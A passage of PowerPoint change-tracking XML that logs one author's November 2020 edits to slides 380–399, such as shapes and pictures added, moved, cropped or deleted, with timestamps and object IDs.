          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T14:06:55.995" v="1737" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2641667682" sldId="380"/>
            <ac:spMk id="5" creationId="{655C2CFD-5BA0-4F5C-AA14-E695FDB45076}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T14:07:21.078" v="1790" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2641667682" sldId="380"/>
            <ac:spMk id="7" creationId="{AB982346-B876-4728-8AAF-1CEF2DE7FD56}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T17:47:27.832" v="3102" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3302855305" sldId="381"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:12:10.781" v="1799" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302855305" sldId="381"/>
            <ac:spMk id="4" creationId="{3073A6F5-F6BD-4D15-9866-8F3A51B13325}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:10:31.404" v="1794" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302855305" sldId="381"/>
            <ac:picMk id="2" creationId="{5170E234-74AC-4F22-A74B-0505CE224BEC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:12:16.373" v="1800" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3302855305" sldId="381"/>
            <ac:picMk id="3" creationId="{BC690FC0-913E-4288-9C7E-A0633D656702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483357656" sldId="382"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:15:11.097" v="7769"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3695542128" sldId="382"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:04:56.708" v="7764" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3695542128" sldId="382"/>
            <ac:spMk id="6" creationId="{CCE47FF0-D83A-42DC-B979-5FC6C60AC099}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:15:37.564" v="1858" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3695542128" sldId="382"/>
            <ac:picMk id="2" creationId="{BC2853CA-4751-4773-A8F6-57D9BFA8B19D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:14:08.693" v="1805" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3695542128" sldId="382"/>
            <ac:picMk id="4" creationId="{51CAF893-62EB-4356-9BC7-6E8808D8A649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731421883" sldId="383"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:30:22.507" v="2182" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3764030952" sldId="383"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:27:12.972" v="2095" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3764030952" sldId="383"/>
            <ac:spMk id="2" creationId="{A542C687-4820-4D85-A8C8-490599013C0B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:11:11.371" v="7768" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3704459030" sldId="384"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:27:43.507" v="2098"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3704459030" sldId="384"/>
            <ac:spMk id="2" creationId="{B532B166-3DDB-431B-8123-D7E34D85C68D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:29:03.917" v="2156" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3704459030" sldId="384"/>
            <ac:spMk id="3" creationId="{D0C7F541-BAE6-4467-B109-9D33DF8623EA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:11:11.371" v="7768" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3704459030" sldId="384"/>
            <ac:spMk id="5" creationId="{C8EB76ED-A2F8-4177-8D49-4B3E81A68DF0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:30:12.128" v="2180" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="58826468" sldId="385"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:29:19.101" v="2179" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="58826468" sldId="385"/>
            <ac:spMk id="2" creationId="{39F432C9-36F8-47CC-AB8D-4CF8F49B2429}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:30:35.006" v="2186" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="669804514" sldId="38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62586493" sldId="38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34360895" sldId="386"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:36:18.179" v="5480" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3730135854" sldId="386"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:39:06.821" v="2730" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3730135854" sldId="386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5:40:50.702" v="2921" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3730135854" sldId="386"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-21T17:14:48.654" v="7295"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1876729422" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:35:48.342" v="2204" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1876729422" sldId="387"/>
            <ac:spMk id="2" creationId="{E830F6E9-23ED-49C4-9FF3-FF49879444D7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T15:38:54.085" v="2710" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1876729422" sldId="387"/>
            <ac:spMk id="3" creationId="{D1693375-D79C-4050-8256-B9B1E639974D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08T18:53:50.114" v="3121" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1699947780" sldId="388"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:47:58.133" v="3103" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:spMk id="2" creationId="{BD52784B-7110-449E-B73C-D6C3B4EECF72}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:47:58.133" v="3103" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:spMk id="3" creationId="{3F01F0BB-E0C9-4511-B3E1-3194E075D212}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:53:50.114" v="3121" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:spMk id="8" creationId="{1B8FF03D-8D5B-49C7-87C6-7D3632493773}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:48:54.233" v="3106" actId="732"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:picMk id="4" creationId="{1E8AEA91-FC94-4043-91A7-D6EF07541CDE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:52:20.784" v="3114" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:picMk id="5" creationId="{EC581BB1-4FC2-4853-9574-5B9633FEC960}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:53:32.519" v="3119" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:picMk id="6" creationId="{CD66EEBC-FB41-4AAB-BCB5-3CA1DCC298BE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:53:23.273" v="3117" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1699947780" sldId="388"/>
            <ac:picMk id="7" creationId="{25718D21-F537-4158-819C-90A9EA6A0C56}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T17:46:13.592" v="3003" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1213134876" sldId="389"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T17:45:18.203" v="2925" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1213134876" sldId="389"/>
            <ac:spMk id="2" creationId="{9466ADA2-70AB-4D6C-A63C-3E385C8B60A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T17:45:18.203" v="2925" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1213134876" sldId="389"/>
            <ac:spMk id="3" creationId="{5240DF16-D1B8-466C-AFD9-32080CB1BEED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T17:46:13.592" v="3003" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1213134876" sldId="389"/>
            <ac:spMk id="5" creationId="{9AF4D2CD-CD4E-4D7A-A54C-507BB578B2BC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:12:48.144" v="3250" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4168017507" sldId="390"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T18:59:07.958" v="3123" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4168017507" sldId="390"/>
            <ac:spMk id="3" creationId="{1B21E374-DEC6-45BC-8F63-C120A58ED373}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:05:38.268" v="3125" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4168017507" sldId="390"/>
            <ac:spMk id="5" creationId="{64429319-E39D-4412-9B50-CEFC5A426B2D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:07:52.432" v="3135" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="768310755" sldId="391"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:07:52.432" v="3135" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="768310755" sldId="391"/>
            <ac:picMk id="2" creationId="{F54EFE98-B5B3-4C4F-AC1D-43D6FBC615EF}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp new">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:07:43.869" v="3132"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="619645780" sldId="392"/>
        </pc:sldMkLst>
        <pc:picChg chg="add">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:07:43.869" v="3132"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="619645780" sldId="392"/>
            <ac:picMk id="2" creationId="{24395E09-CE5A-4903-93AF-246C12A02FC2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08T19:12:31.904" v="3249" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="971020643" sldId="393"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:12:00.969" v="3195" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="971020643" sldId="393"/>
            <ac:spMk id="3" creationId="{CA067256-774F-4A84-8375-3FB984FB4B11}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:12:31.904" v="3249" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="971020643" sldId="393"/>
            <ac:spMk id="6" creationId="{21C6B943-318E-4568-B530-8F7636C84DCE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:12:06.168" v="3196" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="971020643" sldId="393"/>
            <ac:picMk id="5" creationId="{BC8FE9FE-9398-433B-8C02-0B116ECD0D86}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme modAnim chgLayout modNotesTx">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:36:13.289" v="7847" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1236122720" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:21:19.168" v="3825" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1236122720" sldId="394"/>
            <ac:spMk id="2" creationId="{2BDD9906-1BA9-4B98-B22D-6815B361D4CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-22T19:36:13.289" v="7847" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1236122720" sldId="394"/>
            <ac:spMk id="3" creationId="{501072D5-C854-4286-BEAB-5433E54C5F4C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-15T20:42:32.278" v="5497" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="333363459" sldId="395"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:21:41.688" v="3864" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="333363459" sldId="395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9:25:39.521" v="4165" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="333363459" sldId="395"/>
            <ac:spMk id="4" creationId="{478AB046-1B68-488D-AE60-8F01F95A10E4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:21:28.736" v="3837" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="562310306" sldId="395"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:21:26.297" v="3836" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="562310306" sldId="395"/>
            <ac:spMk id="2" creationId="{A24410AC-65EF-40D2-9E7E-933EDB7C727C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:25:59.631" v="4168" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2504548413" sldId="396"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:26:14.308" v="4215" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3972341015" sldId="397"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T19:26:14.308" v="4215" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3972341015" sldId="397"/>
            <ac:spMk id="5" creationId="{9AF4D2CD-CD4E-4D7A-A54C-507BB578B2BC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:24:43.224" v="4235" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1658761661" sldId="398"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod modCrop">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:22:41.472" v="4225" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1658761661" sldId="398"/>
            <ac:picMk id="2" creationId="{FAACC649-E7EA-4FC9-9EE2-22B91368098D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:24:41.936" v="4234" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1658761661" sldId="398"/>
            <ac:picMk id="3" creationId="{0F09F37A-27E9-4BD1-8CA2-65083E9F95E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:24:43.224" v="4235" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1658761661" sldId="398"/>
            <ac:picMk id="4" creationId="{182C9737-F714-4BA5-8EFA-7256F350FF85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17:25:04.034" v="7401"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3105135552" sldId="399"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{9D6A6757-95C0-451B-BD34-2ABD85725987}" dt="2020-11-08T20:25:36.793" v="4240" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3105135552" sldId="399"/>
            <ac:picMk id="2" creationId="{2795BDE4-2652-4EE5-AB08-98DA15B43EA6}"/>
